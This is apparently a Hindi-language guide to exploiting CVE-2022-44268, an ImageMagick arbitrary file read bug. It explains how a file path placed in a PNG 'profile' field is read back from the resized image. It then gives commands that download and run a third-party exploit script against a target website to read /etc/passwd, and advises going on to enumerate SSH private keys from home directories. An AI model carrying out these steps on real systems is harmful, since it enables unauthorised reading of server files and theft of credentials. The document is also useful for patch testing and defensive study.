
CVE-2022-44268 ImageMagick Arbitrary File Read के शोषण को स्वचालित करना

CVE-2022-44268 ImageMagick Arbitrary File Read के शोषण को स्वचालित करना
मूल खोज: https://www.metabaseq.com/imagemagick-zero-days/
PoC रिपॉजिटरी: https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
ImageMagick "profile" टेक्स्ट स्ट्रिंग** को एक फ़ाइलनाम के रूप में** interpret करेगा और सामग्री को लोड करेगा एक raw profile के रूप में, फिर हमलावर आकार-परिवर्तित छवि को डाउनलोड कर सकता है जो एक दूरस्थ फ़ाइल की सामग्री के साथ आएगी।
🔴 एक PNG फ़ाइल लें, "profile" EXIF फ़ील्ड में एक फ़ाइल पथ जोड़ें, इसे ImageMagick के प्रभावित संस्करण का उपयोग करने वाली वेबसाइट पर भेजें, यह फ़ाइल पथ की व्याख्या करता है, उसकी सामग्री को EXIF फ़ील्ड में लोड करता है, आप छवि डाउनलोड करते हैं, "Raw Profile Type" फ़ील्ड में HEX डेटा निकालते हैं, और दूरस्थ फ़ाइल को पढ़ने के लिए इसे ASCII में परिवर्तित करते हैं।
प्रभावित संस्करण: ImageMagick 7.1.0-49
sudo apt install pngcrush imagemagick exiftool exiv2 -y
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/auto-cve-2022-44268.sh
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/flag.png
chmod +x auto-cve-2022-44268.sh
./auto-cve-2022-44268.sh <image name> <file to read>
./auto-cve-2022-44268.sh flag.png /etc/passwd
एक बार जब आपको /etc/passwd से उपयोगकर्ता मिल जाएं, तो /home/.ssh// से SSH निजी कुंजियाँ एन्यूमरेट करने का प्रयास करें :
यह भी न भूलें :
imagemagick, exploit, vuln, magick convert, magick resize, exploitation, vulnerabilities, file read, CVE-2022-44268